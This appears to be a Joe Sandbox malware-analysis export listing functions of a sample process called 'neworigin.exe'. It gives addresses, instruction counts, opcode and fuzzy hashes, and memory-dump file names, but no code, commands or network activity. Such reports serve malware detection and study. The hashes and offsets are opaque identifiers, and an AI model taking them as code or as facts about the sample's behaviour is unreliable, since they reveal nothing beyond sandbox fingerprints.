String ID: D`GuD`Gu$D`GuD`Gu
API String ID: 4108700736-1111891142
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Non-executed Functions

Function 004BF794 Relevance: .1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC

Function 004015D7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000001.1507190833.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1507190833.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1507190833.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

Analysis Process: neworigin.exePID: 4352, Parent PID: 4676COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 06DC2350 Relevance: 1.1, Instructions: 1051COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26de68c7a919418f37afff0305f28b5e14ea6f563f4be577782884d1f6a4523
Instruction ID: 332e5ee61ec0a1a1a5fbfc7ca7d8624732abdd15b7fc90c2a596810f1ceadf98
Opcode Fuzzy Hash: e26de68c7a919418f37afff0305f28b5e14ea6f563f4be577782884d1f6a4523
Instruction Fuzzy Hash: 3FA20234A002098FDBA4DF68C584B9DB7F2FB49324F5585A9D409AB361DB35EE85CF80

Function 06DC66E8 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aef0ea6c70ed2e21071f585ed9598675237d6a803a755a932e9dd0ce5b3c2ca
Instruction ID: 6f6f2dc5e0469b7ee3c7f7e71975c6b6e8583b1084812cd90f9bb2818424401a
Opcode Fuzzy Hash: 8aef0ea6c70ed2e21071f585ed9598675237d6a803a755a932e9dd0ce5b3c2ca
Instruction Fuzzy Hash: 13627F34A0020A9FDB54DB68D594AADB7F2FF84364F148469E806EB390DB35ED46CB90

Function 06DCC2A0 Relevance: .6, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f3a7879c03dc3a3f2a242f161994736b97b9fe658b47af62e27a34de45e7f8
Instruction ID: 9ab314cbe5c784319a1501ff053ffb850f85e001bc2cc6d03605c39ba0889877
Opcode Fuzzy Hash: a9f3a7879c03dc3a3f2a242f161994736b97b9fe658b47af62e27a34de45e7f8
Instruction Fuzzy Hash: 20325F35A1020A9FDF54DF68D990BAEB7B6FB88320F108529D509EB350DB39EC41CB95

Function 06DC56B8 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c2bf8ea3256eda32d31c155d8c4045f185a99cbd390e4061598350787e82c1
Instruction ID: 56a7dc18293de932163d94448bad106940cde57fc272a8b898a12d6982afbab0
Opcode Fuzzy Hash: 89c2bf8ea3256eda32d31c155d8c4045f185a99cbd390e4061598350787e82c1
Instruction Fuzzy Hash: EC12B675F0021A9FDF64DB64E880BAEB7B2EF85320F148469D8559B390DB35EC51CB90

Function 06DCB32A Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e16a34aea951078af256eec4c0ab9396a1eb1d8142043c539463cdf44972817
Instruction ID: cfad44bb2969d754cf31a0c7bcda66bfa7b8f2d5c1528072776fab11b37266cf
Opcode Fuzzy Hash: 3e16a34aea951078af256eec4c0ab9396a1eb1d8142043c539463cdf44972817
Instruction Fuzzy Hash: F7226D70E1020E9BEF64DB68D481BADB7B2FB89320F60852AD455EB391DB35DC41CB91

Function 06DC3178 Relevance: .5, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc652ca29fd111b3a0f342774d1363061defa58f3bc28fc289da63f33eadbff
Instruction ID: 3690589b7244eb54ea70f0a554c1e74b4950b8b3335de8a3f812cd541424b309
Opcode Fuzzy Hash: cdc652ca29fd111b3a0f342774d1363061defa58f3bc28fc289da63f33eadbff
Instruction Fuzzy Hash: C8322E31E1061ACBCB14EF75C850A9DF7B6FF89310F21C66AD449A7260EF349985CB90

Function 06DC7E78 Relevance: .5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8ba1f23d1e854979b19b98659eafa8f6294b78885067b02adc5de3376a908c
Instruction ID: 94cdc028edde49d85c564581711c5c87c280ce700d2df6f45d02f07567c2c492
Opcode Fuzzy Hash: 2e8ba1f23d1e854979b19b98659eafa8f6294b78885067b02adc5de3376a908c
Instruction Fuzzy Hash: 33027C31B0021A9FDB55DF68D890AAEB7F6FF84320F148569D815EB350DB35EC868B90

Function 016BE680 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 016BF057

Memory Dump Source

Source File: 0000000D.00000002.1683014339.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16b0000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 6838c1811dce917065e69ddb980eabf5c1cc9753bb459b71d5eeebdf35dcbd4c
Instruction ID: 483ca339cd95eea56e2c0fa6a47ed405f2b187b8536ab89ffc0b3cc2f5a0e458
Opcode Fuzzy Hash: 6838c1811dce917065e69ddb980eabf5c1cc9753bb459b71d5eeebdf35dcbd4c
Instruction Fuzzy Hash: 051117B1C006599BDB10CF9AD8447DEFBF4AF48210F10816AE918B7350D778A940CFE5

Function 016BEFE8 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 016BF057

Memory Dump Source

Source File: 0000000D.00000002.1683014339.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16b0000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 97960cadd9479c3543474471aee20fe6ad598fa9abc0691c01608071df0ad3e0
Instruction ID: cd0ad81769ed265171607211245c6fa7c9325c6860105ac327ea459e0c061ef3
Opcode Fuzzy Hash: 97960cadd9479c3543474471aee20fe6ad598fa9abc0691c01608071df0ad3e0
Instruction Fuzzy Hash: 8D1133B2C006599FDB14CFAAD8847DEFBF4AF48310F11816AE418A7240C378A940CFA1

Function 06DCD060 Relevance: .8, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43821acd65d9e2fcee87a3029d934786eefda1a24bcd106b6bc0a7e661c785f0
Instruction ID: aac59c3592aac93c0b3d228fd7c1fcd08efddec24f83531d88ce0048435a7127
Opcode Fuzzy Hash: 43821acd65d9e2fcee87a3029d934786eefda1a24bcd106b6bc0a7e661c785f0
Instruction Fuzzy Hash: 42624D30A0030ADFDB55EF68D990A9EB7F2FF85724B208568D0059B354DB79ED46CB80

Function 06DCB760 Relevance: .5, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055b8301237a2642b986bf6af956e230b161f518f2422e2507125dc5af574578
Instruction ID: 4abad56a71ce3a58d9ca847bd286cfa506cebac0c7b58e0b84e2c00079111819
Opcode Fuzzy Hash: 055b8301237a2642b986bf6af956e230b161f518f2422e2507125dc5af574578
Instruction Fuzzy Hash: 32025930E0020E9FDFA4CF68D581AADB7B2FB85720F20856AD456EB250DB75DD41CB91

Function 06DC9250 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e55a9ac0c9402b1dc900811c23113e6232babf91023b0613d56b1678ae733a
Instruction ID: 7fa06326e811cf1ab147ddb3e6a3e173ff57df5c17cacb51a245ce96b32226b8
Opcode Fuzzy Hash: 25e55a9ac0c9402b1dc900811c23113e6232babf91023b0613d56b1678ae733a
Instruction Fuzzy Hash: A9916F30B1020A9FDB95DF68D8607AEB3B6FF84710F108569D809AB354EF35AC458B90

Function 06DC62E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5d0d5cd47339d6b4b84eda06100ddc48b21a2b6f3290c782d44e179f99e367
Instruction ID: 6c74bd08b6ced5ac6b99ef783d9a11081868c5565d4f463a42cca609cb934a82
Opcode Fuzzy Hash: 1c5d0d5cd47339d6b4b84eda06100ddc48b21a2b6f3290c782d44e179f99e367
Instruction Fuzzy Hash: B261D371F001124BDF55AB6EC98456EBAEBEFD4620B294079D80ADB360DE75EC0287D1

Function 06DC43B9 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d6b5bcf6eb55df33c3ca5d14d4f6a7f2796ddea716b1032727fee15f244782
Instruction ID: 4e170ab4a0c56ed93dcb998552995320da109c7bd336881855db3618e37553be
Opcode Fuzzy Hash: 33d6b5bcf6eb55df33c3ca5d14d4f6a7f2796ddea716b1032727fee15f244782
Instruction Fuzzy Hash: EB814C30B0060A9BDF54DFB9D4646AEB7F6EF88310F248529D40AEB354DA75DC428B91

Function 06DC46D8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e800bde39579d55731c591e9f1284c6fd4afa471bc39049fea4d076baf5279bc
Instruction ID: 9bead7e21f77d12bae69c2b08ccab20b192e2b3847195c28d4d4968bf0037767
Opcode Fuzzy Hash: e800bde39579d55731c591e9f1284c6fd4afa471bc39049fea4d076baf5279bc
Instruction Fuzzy Hash: 95914F34E0061A8FDF60DF68C850BDDB7B1FF89310F208599D449AB295DB71AA85CF91

Function 06DCB020 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7025f21d8c36c1b8d43fc51ddcd57d8c3d0fd6afd7ad4ee16325534c137ddb30
Instruction ID: a1032ef651412e6b9ef30408e6d4fd14f901e0ffd1666794ce4ce4bee9302a3b
Opcode Fuzzy Hash: 7025f21d8c36c1b8d43fc51ddcd57d8c3d0fd6afd7ad4ee16325534c137ddb30
Instruction Fuzzy Hash: AA715D31E0071ACFDF64DFA9D8906AEB7B2FF85314F10862AD815AB354DB75D8468B80

Function 06DC46F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33b224129cce1ed27f22a5f14c49e6dc742a483012305b6ac76e8f4b0c30a12
Instruction ID: 72e8aaf34b5fdf8280181d62cfd29b38cdfade6ce90761f35a8bc2a257f7f7b0
Opcode Fuzzy Hash: d33b224129cce1ed27f22a5f14c49e6dc742a483012305b6ac76e8f4b0c30a12
Instruction Fuzzy Hash: 12913F34E1061A8BDF60DF68C850BDDB7B1FF89310F208599D549BB284DB71AA85CF91

Function 06DCEC38 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93bfa609c734fe03b92de812c1092d0983efff37f56129e27861efb27fdc68b
Instruction ID: 9e8b0f002e757e0373dc85453ae347476f147441d866c364b428f7c569a63729
Opcode Fuzzy Hash: a93bfa609c734fe03b92de812c1092d0983efff37f56129e27861efb27fdc68b
Instruction Fuzzy Hash: DB712C70A0020A9FDB54DFA9D990A9EBBFAFF84310F248529E415EB354DB34ED46CB50

Function 06DCEC48 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee43c80e0d3a864cb97cac8e19d756d11504c3f839b3d9c1430427637744802
Instruction ID: 3634e1d7ef126b0ca15a6831fcfd2eedb6444558c1b03c7ca4417011bdbefe26
Opcode Fuzzy Hash: 5ee43c80e0d3a864cb97cac8e19d756d11504c3f839b3d9c1430427637744802
Instruction Fuzzy Hash: 32713A70A0020A9FDB54DFA9C980A9EBBFAFF84310F248529D415EB354DB34ED46CB50

Function 06DC4C88 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0480e777e09044027a51f6bf07de43ba4c1d824f98286dde693052e0087b4e9
Instruction ID: 85df017b571abe64e098fb62ffc47fc093f5f7dc8e840c052f3b27901c895a30
Opcode Fuzzy Hash: f0480e777e09044027a51f6bf07de43ba4c1d824f98286dde693052e0087b4e9
Instruction Fuzzy Hash: DA618330F002199FEF549BA8D514BAEBAF6FF88750F20842DD50AEB390DB759C458B94

Function 06DCFB58 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9124b18e75c88b4200b676d84be979a7850abfbead414ce9b7626b09f868c1ab
Instruction ID: 8f1325d34e90a57bdb6dba0d08f9d4e4a6ac30bd343a4381d4041b2e010ccb4c
Opcode Fuzzy Hash: 9124b18e75c88b4200b676d84be979a7850abfbead414ce9b7626b09f868c1ab
Instruction Fuzzy Hash: 0151A370B103198BEF645B7CD8947AF265BDBC9B60F60443EE40ADB394CA6DCC454792

Function 06DCFB68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d8025daf69f9d9daef3908b039b5a81879d0062d35393cc7734a4d88f98a7c
Instruction ID: 197f7be9aee3360d5ce8e046645a5f5768bb4d08639022e3474189e82359a5a2
Opcode Fuzzy Hash: 10d8025daf69f9d9daef3908b039b5a81879d0062d35393cc7734a4d88f98a7c
Instruction Fuzzy Hash: 67518270B1021A8BEF645BB8D9947AF225BDBC9B60F60443EE40BD7394CE6DCC454792

Function 06DC9241 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e0d31f0b7153cc890805a90e151e84203cbf9365d9f62c337dc7969bb457d0
Instruction ID: 80a10193bc0d2e177fcab991b0e3ec2605f3cb05db72510afe58ae3f06c59613
Opcode Fuzzy Hash: c8e0d31f0b7153cc890805a90e151e84203cbf9365d9f62c337dc7969bb457d0
Instruction Fuzzy Hash: C2517131B1110A9FDB95DF78D860BAE77F6EB88350F10847AD409EB354DE39AC028B94

Function 06DC4C78 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d2c200a1dc9cd8c99082b22e595266802493a2e35aa65e8fd10dcd4c57fa98
Instruction ID: 0fe9cbe6da1f1dc1780b6d971b4310cae6b94da00e6b04acc5cc6ffdc84df5d5
Opcode Fuzzy Hash: 05d2c200a1dc9cd8c99082b22e595266802493a2e35aa65e8fd10dcd4c57fa98
Instruction Fuzzy Hash: D4518230F002199FDB549FA9C814BAEBAF6FFC8750F208429E505EB394DE759C058B95

Function 06DC5531 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262f59bbe161b105cae180d9b4f0378d444e58463de9dcad6bfad8ca626b58cf
Instruction ID: b55d2a6371a5be2fd332b8939686320810797102901482aa302b4c430921274e
Opcode Fuzzy Hash: 262f59bbe161b105cae180d9b4f0378d444e58463de9dcad6bfad8ca626b58cf
Instruction Fuzzy Hash: 0F417071E0060A8FDF60CF99E880ABFF7B2EB95220F10492AD156D3650D730E8658B91

Function 06DCFDA7 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d28724af75d05a70857a6073d9c3b6e0ae8484dfb467e90bce3c18b2df0d794
Instruction ID: c769b6394eeee524a90284c00d037fc0f70ba6089ea2dc952927bfab2e3fe267
Opcode Fuzzy Hash: 2d28724af75d05a70857a6073d9c3b6e0ae8484dfb467e90bce3c18b2df0d794
Instruction Fuzzy Hash: F1411172A0436A9FEB159B6488507EEBBFAFFC9760F24452EC0459B280DB709805C7E5

Function 06DCDBD5 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25d1a127f027df29ce6ae164709e09c957eb2be0f67c6d48d73b8543a93de19
Instruction ID: 63a0713c8298a12462a1be0b073fe5500b0f93c506beb975b586ba91854b2164
Opcode Fuzzy Hash: a25d1a127f027df29ce6ae164709e09c957eb2be0f67c6d48d73b8543a93de19
Instruction Fuzzy Hash: 4D41AE70E0030A9FDB659F65C98069EBBB6FF85710F20452DE402EB240DBB5D946CB81

Function 06DC21D8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9be2773e14c4a7c62889f1657f5aad72b1e0e3899b2ae037924084201bef5b46
Instruction ID: dcc232120a1759cb0830f080da055a249a173c5963d7dbf137fa1dd76f8f9ea4
Opcode Fuzzy Hash: 9be2773e14c4a7c62889f1657f5aad72b1e0e3899b2ae037924084201bef5b46
Instruction Fuzzy Hash: CB319030B0020A9FDB69AB74D45466E76A6AFC9720F20852CD402DB391DF39DD01C795

Function 06DC2088 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc903ee439abf4d19371901215422c2bb20a87f2f1de8adbc3f62cccf9a3268f
Instruction ID: 838b2680557260b382f70ea173c5e76bebf3c6a6d21cb0f447fcfd84a8e79649
Opcode Fuzzy Hash: cc903ee439abf4d19371901215422c2bb20a87f2f1de8adbc3f62cccf9a3268f
Instruction Fuzzy Hash: ED318F30E1021A9BCB58DF69D89469EB7F2FF89350F108519E906E7340DB71AE42CB50

Function 06DC2098 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abd33af85c07f6010e062f00899306cbf669d9d7f14511ee229035a7d9502e5
Instruction ID: 791e6b226358b2cac811d3f5ce177e63da42b6ca287f3252712f63376120c07e
Opcode Fuzzy Hash: 5abd33af85c07f6010e062f00899306cbf669d9d7f14511ee229035a7d9502e5
Instruction Fuzzy Hash: EB318C30E1061A9BCB59CFA9D89469EB7B2FF89350F10852DE906E7340DB71AE42CB50

Function 06DC3BB9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85dcce8d0086617cdec15c2d4d864db60e4d49ac89dc0da8a24d7569b3cbc97
Instruction ID: 9452368937b369cb07c1fa1e7df0461ce3ae389f152500d69b69bbb4fa809864
Opcode Fuzzy Hash: e85dcce8d0086617cdec15c2d4d864db60e4d49ac89dc0da8a24d7569b3cbc97
Instruction Fuzzy Hash: 03218D75E0121A9FDB50DF78D880AEEBBF5EB88310F118029E901E7350E739DC418B94

Function 06DC3BC8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1741099463.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6dc0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648aaf9d12174f282610afe026e23bbe2da09bd057b4ccb36e597301d693a4e3
Instruction ID: 4991a9e608d72a6dc28366a82d969667ced4a7768151c6f9beff03de9ae38576
Opcode Fuzzy Hash: 648aaf9d12174f282610afe026e23bbe2da09bd057b4ccb36e597301d693a4e3
Instruction Fuzzy Hash: 51216975E0061A9FDB50DFB9D980AEEB7F5EB48320F108029E905E7390E739DD418B94

Function 0136D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1658430846.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_136d000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d246722d2bb3643e83db6b56789a9cc79d17141ff6a72d42e86de712a66009
Instruction ID: e1f4d0c61beff80b88f393a2c6a2b9fa7406ad273be23432005af21577645a47
Opcode Fuzzy Hash: a2d246722d2bb3643e83db6b56789a9cc79d17141ff6a72d42e86de712a66009
Instruction Fuzzy Hash: 032104B1604304EFDB15DF64C9C4B26BBA9FB84318F20C56DE8894F64AC776D447CA62

